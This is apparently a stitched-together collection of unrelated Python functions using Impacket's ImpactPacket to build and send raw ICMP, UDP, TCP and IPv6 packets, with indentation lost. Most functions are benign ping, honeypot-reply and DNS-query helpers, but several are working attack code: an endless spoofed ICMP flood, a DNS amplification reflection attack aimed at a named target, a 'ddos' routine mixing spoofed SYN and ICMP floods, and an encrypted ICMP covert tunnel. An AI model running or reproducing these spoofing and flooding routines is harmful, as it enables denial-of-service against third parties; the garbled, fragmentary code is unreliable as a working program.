def send_raw(self, data):
# posljednja obrada podataka prije slanja
if data not in [TUNNEL_STS, TUNNEL_RET, TUNNEL_NOOP]:
# ako podaci nisu SwitchToServer niti Retrieve/NOOP naredbe
# dodajemo CLIENT/SERVER prefixe ovisno o trenutnom modu rada
if self.operating_as == CLIENT:
data = CLIENT_PREFIX + data
else:
data = SERVER_PREFIX + data
cipher = mData.DataMangler(data) # kreiramo novi kriptoobjekt
# podaci se u kriptoobjektu kriptiraju sa odabranim passwordom i algoritmom,
# uzima se samo prvih 1408 znakova (Ethernet ogranicenje 1500 bytes frame size, broj mora biti djeljiv sa 16 zbog AESa) i stavlja u ICMP data polje
self.icmp.contains(
ImpactPacket.Data(
cipher.obfuscate(self.password, self.algo)[:1408]))
# Uvecavamo ICMP paketu ID samo ako smo klijent
if self.operating_as == CLIENT:
self.seq_id += 1
if self.seq_id > 65535:
# ID je samo 2 byta, treba paziti na preljev
self.seq_id = 0
# vrijednost iz seq_id postavljamo i u ID polje i u SEQ polje
self.icmp.set_icmp_id(self.seq_id)
self.icmp.set_icmp_seq(self.seq_id)
# automatsko racunanje checkshuma
self.icmp.set_icmp_cksum(0)
self.icmp.auto_checksum = 1
# ICMP paket pakira se u IP paket
self.ip.contains(self.icmp)
# saljemo finalni paket
self.tunnel_sock.sendto(self.ip.get_packet(), (self.dst_ip_addr, 0))
def send_message(self, source_ip, dest_ip, current_socket, msg, seq_number,
is_ret):
#Create a new IP packet and set its source and destination IP addresses
src = source_ip
dst = dest_ip
ip = ImpactPacket.IP()
#print(src.__str__() + " to " + dst.__str__())
ip.set_ip_src(src)
ip.set_ip_dst(dst)
#Create a new ICMP ECHO_REQUEST packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
#inlude a small payload inside the ICMP packet
#and have the ip packet contain the ICMP packet
icmp.contains(ImpactPacket.Data(msg))
ip.contains(icmp)
#give the ICMP packet some ID
if is_ret:
icmp.set_icmp_id(0x04)
else:
icmp.set_icmp_id(0x03)
#set the ICMP packet checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
icmp.set_icmp_seq(seq_number)
self.send_packet(current_socket, ip.get_packet(), dst)
def flood(src, dst):
# create packet
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
# Include a 156-character long payload inside the ICMP packet.
icmp.contains(ImpactPacket.Data("A" * 156))
# Have the IP packet contain the ICMP packet (along with its payload).
ip.contains(icmp)
seq_id = 0
while 1:
# Give the ICMP packet the next ID in the sequence.
seq_id += 1
icmp.set_icmp_id(seq_id)
# Calculate its checksum.
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# send packet
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# Send it to the target host.
s.sendto(ip.get_packet(), (dst, 0))
print("sent from %s of sid: %d" % (src, seq_id))
continue
def send_one_ping(cls, current_socket, src, dst, icmp_packet_id, payload):
# print("SEND : " + src[-1] + " -> " + dst[-1] + " Payload : " + payload)
#Create a new IP packet and set its source and destination IP addresses
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
#Create a new ICMP ECHO_REQUEST packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
#inlude a small payload inside the ICMP packet
#and have the ip packet contain the ICMP packet
icmp.contains(ImpactPacket.Data(payload))
ip.contains(icmp)
#give the ICMP packet some ID
icmp.set_icmp_id(icmp_packet_id)
#set the ICMP packet checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
send_time = default_timer()
# send the provided ICMP packet over a 3rd socket
try:
current_socket.sendto(
ip.get_packet(),
(dst, 1)) # Port number is irrelevant for ICMP
except socket.error as e:
print("# socket creation failed.")
current_socket.close()
return
def send_ns_packet(self,
source_link,
send_frequency,
target_address,
vlan_id=0):
ip = IP6.IP6()
ip.set_source_address(self.get_source_address())
ip.set_destination_address(self.get_target_address())
ip.set_traffic_class(0)
ip.set_flow_label(0)
ip.set_hop_limit(255)
s = socket(AF_PACKET, SOCK_RAW, IPPROTO_ICMPV6)
s.bind((self.network_card, N))
payload = self.create_ns_message(source_link, target_address)
print send_frequency
for i in range(0, send_frequency):
icmp = ICMP6.ICMP6()
icmp.set_byte(0, 135) # Put Type?
icmp.set_byte(1, 00) # Put Code?
payloadObject = ImpactPacket.Data()
payloadObject.set_data(payload)
icmp.contains(payloadObject)
ip.contains(icmp)
ip.set_next_header(ip.child().get_ip_protocol_number())
ip.set_payload_length(ip.child().get_size())
eth = ImpactPacket.Ethernet(
'\x33\x33\x00\x00\x00\x01\xff\xff\xff\xff\xff\xff\x81\x00')
eth.pop_tag()
if vlan_id != 0:
vlan = ImpactPacket.EthernetTag()
vlan.set_vid(vlan_id)
eth.push_tag(vlan)
icmp.calculate_checksum()
eth.contains(ip)
s.send(eth.get_packet())
def icmp_reply(self, eth_src, eth_dst, ip_src, ip_dst, i_type, i_code,
ip_pkt):
# TODO: we have access to the personality here
"""Function creates and sends back an ICMP reply
Args:
eth_src : ethernet source address
eth_dst : ethernet destination address
ip_src : ip source address
ip_dst : ip destination address
i_type : type of the icmp reply
i_code : code of the icmp reply
"""
# truncate inner packet
l = ip_pkt.get_ip_len()
hdr = None
if l > 1472: # (MTU) 1500 - (IPv4) 20 - (ICMP) 8 = 1472
hdr = ip_pkt.get_packet()[:1472]
else:
hdr = ip_pkt.get_packet()
# icmp packet
reply_icmp = ImpactPacket.ICMP()
reply_icmp.set_icmp_type(i_type)
reply_icmp.set_icmp_code(i_code)
reply_icmp.set_icmp_id(0)
reply_icmp.set_icmp_seq(0)
reply_icmp.set_icmp_void(0)
reply_icmp.contains(ImpactPacket.Data(hdr))
reply_icmp.calculate_checksum()
reply_icmp.auto_checksum = 1
# ip packet
reply_ip = ImpactPacket.IP()
reply_ip.set_ip_v(4)
reply_ip.set_ip_p(1)
reply_ip.set_ip_rf(False)
reply_ip.set_ip_df(False)
reply_ip.set_ip_mf(False)
reply_ip.set_ip_src(ip_src)
reply_ip.set_ip_dst(ip_dst)
reply_ip.set_ip_id(
random.randint(0, 50000)
) # TODO: provide IP IDs according to personality, altough tracepath does not care
reply_ip.contains(reply_icmp)
# ethernet frame
reply_eth = ImpactPacket.Ethernet()
reply_eth.set_ether_type(0x800)
eth_src = [int(i, 16) for i in eth_src.split(':')]
eth_dst = [int(i, 16) for i in eth_dst.split(':')]
reply_eth.set_ether_shost(eth_src)
reply_eth.set_ether_dhost(eth_dst)
reply_eth.contains(reply_ip)
logger.debug('Sending reply: %s', reply_eth)
# send raw frame
try:
self.pcapy_object.sendpacket(reply_eth.get_packet())
except pcapy.PcapError as ex:
logger.exception('Exception: Cannot send reply packet: %s', ex)
def sendReply(nonce):
#build ethernet frame
eth = ImpactPacket.Ethernet()
eth.set_ether_type(0x88b5)
eth.set_ether_shost(ETH_MY_MAC)
eth.set_ether_dhost(ETH_MY_MAC)
#build ip packet
ip = ImpactPacket.IP()
ip.set_ip_v(4)
ip.set_ip_len(32)
ip.set_ip_src("127.0.0.1")
ip.set_ip_dst("127.0.0.1")
#build UDP packet
udp = ImpactPacket.UDP()
udp.set_uh_sport(62001)
udp.set_uh_dport(62000)
udp.set_uh_ulen(12)
payload = nonce
udp.contains(ImpactPacket.Data(payload))
ip.contains(udp)
eth.contains(ip)
device = findalldevs()[0]
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x88b5))
s.bind(('lo', 0))
s.send(eth.get_packet())
print "Sent: " + nonce
signal.alarm(0) #disable the alarm
def filtered(self, packet, path, personality, **kwargs):
"""Function defines filtered port behavior - filtered is defined according to nmap"""
callback_ipid = kwargs.get('cb_ipid', None)
# respond with ICMP error type 3 code 13 OR ignore
# icmp packet
reply_icmp = ImpactPacket.ICMP()
reply_icmp.set_icmp_type(ImpactPacket.ICMP.ICMP_UNREACH)
reply_icmp.set_icmp_code(ImpactPacket.ICMP.ICMP_UNREACH_FILTERPROHIB)
reply_icmp.set_icmp_void(0)
reply_icmp.set_icmp_id(0)
reply_icmp.set_icmp_seq(0)
hdr = None
l = packet.get_ip_len()
if l > 1472: # 1500 - 20 - 8 (MTU - IP - ICMP)
hdr = packet.get_packet()[:1472]
else:
hdr = packet.get_packet()
reply_icmp.contains(ImpactPacket.Data(hdr))
reply_icmp.calculate_checksum()
reply_icmp.auto_checksum = 1
# ip packet
reply_ip = ImpactPacket.IP()
reply_ip.set_ip_v(4)
reply_ip.set_ip_p(1)
reply_ip.set_ip_rf(False)
reply_ip.set_ip_df(False)
reply_ip.set_ip_mf(False)
reply_ip.set_ip_src(packet.get_ip_dst())
reply_ip.set_ip_dst(packet.get_ip_src())
reply_ip.set_ip_id(callback_ipid())
# check T
ttl = 0x7f
if 'T' in personality.fp_ie:
try:
ttl = personality.fp_ie['T'].split('-')
# using minimum ttl
ttl = int(ttl[0], 16)
except BaseException:
raise Exception('Unsupported IE:T=%s', personality.fp_ie['T'])
# check TG
if 'TG' in personality.fp_ie:
try:
ttl = int(personality.fp_ie['TG'], 16)
except BaseException:
raise Exception('Unsupported IE:TG=%s',
personality.fp_ie['TG'])
delta_ttl = ttl - path
if delta_ttl < 1:
logger.debug(
'Reply packet dropped: TTL reached 0 within virtual network.')
return None
reply_ip.set_ip_ttl(delta_ttl)
reply_ip.auto_checksum = 1
reply_ip.contains(reply_icmp)
return reply_ip
def __build_option(class_object, type, length, option_data):
#Pack data
data_bytes = struct.pack('>BB', type, length)
data_bytes += option_data
ndp_option = ImpactPacket.Data()
ndp_option.set_data(data_bytes)
return ndp_option
def sendpacket(self, data):
ipe = ImpactPacket.Ethernet()
ipe.set_ether_dhost(self.MACADDRESS)
ipd = ImpactPacket.Data(data)
ipd.ethertype = 0x86dd # Ethertype for IPv6
ipe.contains(ipd)
p = ipe.get_packet()
self.s.send(p)
def emitter(self):
""" The emitter method is responsible for establishing the connections or sending the packets associated with
the plugin. Emitter MUST use the encoder() method to assemble payloads
:return: True if successful
"""
try:
src = self.getlocaladdr()
try:
dst = socket.gethostbyname(self.target)
except Exception as e:
dst = self.target
self.logger.error('Failed to resolve target hostname for %s: %s' % (self.__class__.__name__, e))
raise e
# Fetch the icmptype property as a list
icmptypes = self.listproperty('icmptype')
print icmptypes
if not icmptypes:
icmptypes = [8]
# Send the payload to the encoder which returns a generator, then iterate over the chunked and encoded
# payload
for payload in self.encoder(self.payload):
# Iterate over all of the specified types for this payload and execute the delivery
for icmptype in icmptypes:
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmptype)
seq_id = 0
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
icmp.contains(ImpactPacket.Data(payload))
ip.contains(icmp)
icmp.set_icmp_id(seq_id)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
s.sendto(ip.get_packet(), (self.target, 0))
seq_id += 1
except socket.error:
raise
except Exception:
raise
return True
def udppacket(con, data):
"""Function returning a udppacket for the given connection with data as
payload with target con.tail."""
data = ImpactPacket.Data(data)
udp = ImpactPacket.UDP()
udp.set_uh_dport(con.tail.port)
udp.set_uh_sport(con.head.port)
udp.contains(data)
ethhead = con.packet(Connection.TAIL, udp)
packet = vdepad(cksum(ethhead))
return packet
def __build_message(class_object, type, message_data):
#Build NDP header
ndp_packet = NDP()
ndp_packet.set_type(type)
ndp_packet.set_code(0)
#Pack payload
ndp_payload = ImpactPacket.Data()
ndp_payload.set_data(message_data)
ndp_packet.contains(ndp_payload)
return ndp_packet
def main():
if len(sys.argv) < 3:
print("Use: %s <src ip> <dst ip>" % sys.argv[0])
print("Use: %s <src ip> <dst ip> <cnt>" % sys.argv[0])
sys.exit(1)
elif len(sys.argv) == 3:
src = sys.argv[1]
dst = sys.argv[2]
cnt = 1
elif len(sys.argv) == 4:
src = sys.argv[1]
dst = sys.argv[2]
cnt = sys.argv[3]
else:
print("Input error!")
sys.exit(1)
# print src, dst
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
# Create a new ICMP packet of type ECHO.
icmp = ImpactPacket.ICMP()
tcp = ImpactPacket.TCP()
tcp.set_th_sport(55968)
tcp.set_th_dport(80)
tcp.set_th_seq(1)
tcp.set_th_ack(1)
tcp.set_th_flags(0x18)
tcp.set_th_win(64)
tcp.contains(
ImpactPacket.Data(
"GET /att/DIYLife/41264/528 HTTP/1.1\r\nHost: 192.168.111.1\r\nAccept-Encoding: identity\r\n\r\n"
))
ip.contains(tcp)
# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
seq_id = 0
while cnt >= 1:
# Calculate its checksum.
seq_id = seq_id + 1
tcp.set_th_seq(seq_id)
tcp.calculate_checksum()
# Send it to the target host.
s.sendto(ip.get_packet(), (dst, 80))
cnt = cnt - 1
def alive(src, dst):
# Create a new IP packet and set its source and destination addresses.
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
# Create a new ICMP packet of type ECHO.
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
# Include a 156-character long payload inside the ICMP packet.
icmp.contains(ImpactPacket.Data("A" * 156))
# Have the IP packet contain the ICMP packet (along with its payload).
ip.contains(icmp)
# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
seq_id = 0
# Give the ICMP packet the next ID in the sequence.
seq_id += 1
icmp.set_icmp_id(seq_id)
# Calculate its checksum.
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# Send it to the target host.
s.sendto(ip.get_packet(), (dst, 0))
for i in range(3):
# Wait for incoming replies.
if s in select.select([s], [], [], 1)[0]:
reply = s.recvfrom(2000)[0]
# Use ImpactDecoder to reconstruct the packet hierarchy.
rip = ImpactDecoder.IPDecoder().decode(reply)
# Extract the ICMP packet from its container (the IP packet).
ricmp = rip.child()
# If the packet matches, report it to the user.
if rip.get_ip_dst() == src and rip.get_ip_src(
) == dst and icmp.ICMP_ECHOREPLY == ricmp.get_icmp_type():
return True
time.sleep(1)
return False
def send_one_ping(self,src,dst,current_socket,icmp_payload):
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
icmp.contains(ImpactPacket.Data(icmp_payload))
ip.contains(icmp)
icmp.set_icmp_id(0x03)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
send_time = default_timer()
current_socket.sendto(ip.get_packet(), (dst, 1))
def encodePacket(self, src, dst, type, code, ttl, payload):
payload = ImpactPacket.Data(payload)
icmpDatagram = ImpactPacket.ICMP()
icmpDatagram.set_icmp_type(type)
if code:
icmpDatagram.set_icmp_code(code)
icmpDatagram.set_icmp_lifetime(ttl)
icmpDatagram.set_icmp_ttime(ttl)
icmpDatagram.contains(payload)
ipDatagram = ImpactPacket.IP()
ipDatagram.set_ip_src(src)
ipDatagram.set_ip_dst(dst)
ipDatagram.contains(icmpDatagram)
self.raw = ipDatagram.get_packet()
def buildAnswer(self, in_onion):
cmd = in_onion[O_UDP_DATA].get_bytes().tostring()
if cmd[:4] == 'cmd:': cmd = cmd[4:].strip()
print "Got command: %r" % cmd
if cmd == 'exit':
from sys import exit
exit()
out_onion = OpenUDPResponder.buildAnswer(self, in_onion)
out_onion.append(ImpactPacket.Data())
out_onion[O_UDP].contains(out_onion[O_UDP_DATA])
if cmd == 'who':
out_onion[O_UDP_DATA].set_data(self.machine.fingerprint.get_id())
return out_onion
def main():
signal.signal(signal.SIGALRM, lambda *args: handle_alarm())
#build ethernet frame
eth = ImpactPacket.Ethernet()
eth.set_ether_type(0x88b5)
eth.set_ether_shost(ETH_MY_MAC)
eth.set_ether_dhost(ETH_MY_MAC)
#build ip packet
ip = ImpactPacket.IP()
ip.set_ip_v(4)
ip.set_ip_len(32)
ip.set_ip_src("127.0.0.1")
ip.set_ip_dst("127.0.0.1")
#build UDP packet
udp = ImpactPacket.UDP()
udp.set_uh_sport(62000)
udp.set_uh_dport(62001)
udp.set_uh_ulen(12)
inp1 = ''
print "Client.... Port: " + str(udp.get_uh_sport())
print "--------------------------------------------"
while (len(inp1) != 4):
inp1 = raw_input('Enter 4-bit ASCII nonce to send: ')
if (len(inp1) != 4):
print "Enter 4-bit ASCII"
payload = inp1
udp.contains(ImpactPacket.Data(payload))
ip.contains(udp)
eth.contains(ip)
device = 'lo'
s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x88b5))
s.bind((device, 0))
s.send(eth.get_packet())
print "Sent: " + inp1
receiveReply()
def handle_icmp(pcap, wire_packet, ip):
icmp = ip.child()
if icmp.get_icmp_type() == ImpactPacket.ICMP.ICMP_ECHO:
reply = build_ethernet_reply(wire_packet, ImpactPacket.IP.ethertype)
ip_reply = build_ip_reply(ip, ImpactPacket.ICMP.protocol)
icmp_reply = ImpactPacket.ICMP()
icmp_reply.set_icmp_type(ImpactPacket.ICMP.ICMP_ECHOREPLY)
icmp_reply.set_icmp_seq(icmp.get_icmp_seq())
icmp_reply.set_icmp_id(icmp.get_icmp_id())
icmp_reply.contains(ImpactPacket.Data(icmp.get_data_as_string()))
ip_reply.contains(icmp_reply)
reply.contains(ip_reply)
pcap_sendpacket(pcap, cast(reply.get_packet(), POINTER(u_char)),
reply.get_size())
def send_one_ping(self, current_socket, data, identifier):
print "-Sending an ICMP ECHO_REQUEST packet from {0} to {1}".format(
self.source, self.destination)
src, dst = self.source, self.destination
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
icmp.contains(ImpactPacket.Data(data))
ip.contains(icmp)
icmp.set_icmp_id(identifier)
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
try:
current_socket.sendto(ip.get_packet(), (dst, 1))
except socket.error:
current_socket.close()
def main():
if not (len(sys.argv) == 3):
print "Syntax:"
print " python amplify-dns.py <dns-server> <target>"
print " dns-server is the IP address of the DNS server who's replies will be redirected to the target."
print " target is the IP address of the attack target."
print
print "DO NOT DISTRIBUTE THIS CODE. It can do bad things; use it for learning, not for evil."
exit()
server_address = (sys.argv[1], 53)
target_address = (sys.argv[2], 8080)
# Create a UDP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP)
try:
sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
#sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#sock.bind(target_address) # spoof sender address so response goes to the target
random.seed() # randome used to generate unique-(ish) Transaction IDs
ip = ImpactPacket.IP()
ip.set_ip_src(target_address[0])
ip.set_ip_dst(server_address[0])
udp = ImpactPacket.UDP()
udp.set_uh_sport(target_address[1])
udp.set_uh_dport(server_address[1])
ip.contains(udp)
request_msg = create_dns_request("www.cs6250.com")
while True:
time.sleep(0.1)
# Replace Transaction ID on each retransmission (so they look unique)
request_msg[0] = struct.pack('!BB', random.randint(0, 255),
random.randint(0, 255))
udp.contains(ImpactPacket.Data("".join(request_msg)))
sock.sendto(ip.get_packet(), server_address)
finally:
sock.close()
def tcppacket(con, data):
"""Function returning a tcppacket for the given connection with data as
payload with target con.tail."""
datalength = len(str(data))
data = ImpactPacket.Data(data)
tcp = ImpactPacket.TCP()
tcp.set_th_dport(con.tail.port)
tcp.set_th_sport(con.head.port)
# Set ack to the expected value.
tcp.set_th_ack(con.tail.expectedAcknr(0))
# Increment expected seqnr (tail) by number of sent bytes.
tcp.set_th_seq(con.tail.expectedSeqnr(datalength))
if s.verbosity > 1:
s.logfile.write("SeqNr: " + str(tcp.get_th_seq()) + "\n")
tcp.set_ACK()
tcp.contains(data)
con.tail.acknr(datalength)
ethhead = con.packet(Connection.TAIL, tcp)
packet = vdepad(cksum(ethhead))
return packet
def send_one_ping(self, current_socket):
#Create a new IP packet and set its source and destination IP addresses
# src = srcIP
src = getSrcIP()
print("src is %s" % (src))
dst = self.destination
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
#Create a new ICMP ECHO_REQUEST packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
#inlude a small payload inside the ICMP packet
#and have the ip packet contain the ICMP packet
# put files here
icmp.contains(ImpactPacket.Data(str(requests)))
ip.contains(icmp)
#give the ICMP packet some ID
icmp.set_icmp_id(0x03)
#set the ICMP packet checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
send_time = default_timer()
# send the provided ICMP packet over a 3rd socket
try:
current_socket.sendto(
ip.get_packet(),
(dst, 1)) # Port number is irrelevant for ICMP
except socket.error as e:
self.response.output.append("General failure (%s)" % (e.args[1]))
current_socket.close()
return
return send_time
def main():
'''main function for using as cli'''
args = get_args()
query = dns.message.make_query(args.qname,
dns.rdatatype.from_text(args.qtype),
dns.rdataclass.from_text(args.qclass))
if args.nsid:
query.use_edns(payload=4096,
options=[dns.edns.GenericOption(dns.edns.NSID, '')])
data = ImpactPacket.Data(query.to_wire())
udp = ImpactPacket.UDP()
udp.set_uh_sport(args.source_port)
udp.set_uh_dport(args.destination_port)
udp.contains(data)
ip = ImpactPacket.IP()
ip.set_ip_src(args.source)
ip.set_ip_dst(args.destination)
ip.contains(udp)
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_UDP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
s.sendto(ip.get_packet(), (args.destination, args.destination_port))
def SendICMP(srcIP, dstIP, sessionNr, counter):
""" SendICMP sends a specially crafted ICMP packet """
# prepare the IP part
ip = ImpactPacket.IP()
ip.set_ip_src(srcIP)
ip.set_ip_dst(dstIP)
#this counter isn't used.
ip.set_ip_id(counter)
# prepare the ICMP part
icmp = ImpactPacket.ICMP()
#is used to read out uniquenumber in case of DU ICMP reply
icmp.set_icmp_id(sessionNr)
#is used to read out sessionnumber in case of DU ICMP reply
icmp.set_icmp_seq(counter)
#auto generate checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
icmp.set_icmp_type(icmp.ICMP_ECHO)
# prepare the payload
# put the target IP and the sequence number in the payload also for later recovery
data = socket.inet_aton(dstIP) + struct.pack(
'H', socket.htons(sessionNr)) + struct.pack('H', socket.htons(counter))
# compose the total packet IP / icmp / payload
icmp.contains(ImpactPacket.Data(data))
ip.contains(icmp)
# Open a raw socket. Special permissions are usually required.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
# and set it free
s.sendto(ip.get_packet(), (dstIP, 0))
# return timestamp for further reference
return time.time()
def work(rate):
libdivert = MacDivert()
ip_decoder = ImpactDecoder.IPDecoder()
with DivertHandle(libdivert, 0, "tcp from any to any via en0") as fid:
# register stop loop signal
signal(SIGINT, lambda x, y: fid.close())
while not fid.closed:
try:
divert_packet = fid.read(timeout=0.5)
except:
continue
if divert_packet.valid:
# decode the IP packet
ip_packet = ip_decoder.decode(divert_packet.ip_data)
if ip_packet.get_ip_p() == socket.IPPROTO_TCP:
# extract the TCP packet
tcp_packet = ip_packet.child()
# extract the payload
payload = tcp_packet.get_data_as_string()
# if there is payload of this TCP packet
if len(payload) > 0 and random.random() < rate:
# modify one byte of the packet
modify_pos = random.randint(0, len(payload) - 1)
payload = payload[0:modify_pos] + '\x02' + payload[
modify_pos + 1:]
# create Data object with modified data
new_data = ImpactPacket.Data(payload)
# replace the payload of TCP packet with new Data object
tcp_packet.contains(new_data)
# update the packet checksum
tcp_packet.calculate_checksum()
# replace the payload of IP packet with new TCP object
ip_packet.contains(tcp_packet)
# update the packet checksum
ip_packet.calculate_checksum()
# finally replace the raw data of diverted packet with modified one
divert_packet.ip_data = ip_packet.get_packet()
if not fid.closed:
fid.write(divert_packet)
def ddos(src, dst):
#Create a new IP packet and set its source and destination addresses
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
#Create a new ICMP packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
#inlude a small payload inside the ICMP packet
#and have the ip packet contain the ICMP packet
icmp.contains(ImpactPacket.Data("O" * 100))
ip.contains(icmp)
n = 0
while (1):
print("Spoofing from %s" % src)
#Using Scapy to SYN flood
p1 = IP(dst=target_ip, src=src) / TCP(
dport=8080, sport=5000, flags='S')
send(p1)
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
#Using ImpactPacket to flood/spoof
icmp.set_icmp_id(1)
#calculate checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 0
s.sendto(ip.get_packet(), (dst, 8080))
#Regular socket connection
ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ddos.connect((target_ip, port))
ddos.send("GET /%s HTTP/1.1\r\n" % message)
def send_one_ping(self, current_socket, ip_header, payload):
if payload[0:6] == "finish":
firstNode = randint(1, 4)
while (firstNode == self.bezi):
firstNode = randint(1, 4)
self.source = "10.0.0." + str(firstNode)
self.destination = "10.0.0." + str(self.bezi)
else:
firstNode = randint(1, 4)
secondNode = randint(1, 4)
while (secondNode == self.nodeNum or secondNode == firstNode):
firstNode = randint(1, 4)
secondNode = randint(1, 4)
self.source = "10.0.0." + str(firstNode)
self.destination = "10.0.0." + str(secondNode)
print(self.source)
print(self.destination)
src = self.source
dst = self.destination
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
icmp = ImpactPacket.ICMP()
icmp.contains(ImpactPacket.Data(payload))
icmp.set_icmp_type(icmp.ICMP_ECHO)
ip.contains(icmp)
icmp.set_icmp_id(icmp.get_icmp_id()) ####
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
send_time = default_timer()
try:
current_socket.sendto(ip.get_packet(), (dst, 1))
except socket.error as e:
self.response.output.append("General failure (%s)" % (e.args[1]))
current_socket.close()
return
return send_time
def send(self, current_socket,src,dst,data,chunk_id=0):
# Create a new IP packet and set its source and destination IP addresses
#print("sending from " + src + " to " + dst)
#print("+++++++++++++++++++++++++++++")
ip = ImpactPacket.IP()
ip.set_ip_src(src)
ip.set_ip_dst(dst)
# Create a new ICMP ECHO_REQUEST packet
icmp = ImpactPacket.ICMP()
icmp.set_icmp_type(icmp.ICMP_ECHO)
# inlude a small payload inside the ICMP packet
# and have the ip packet contain the ICMP packet
icmp.contains(ImpactPacket.Data(data))
ip.contains(icmp)
# give the ICMP packet some ID
icmp.set_icmp_id(chunk_id)
# set the ICMP packet checksum
icmp.set_icmp_cksum(0)
icmp.auto_checksum = 1
# send the provided ICMP packet over a 3rd socket
try:
current_socket.sendto(ip.get_packet(), (dst, 1)) # Port number is irrelevant for ICMP
except socket.error as e:
return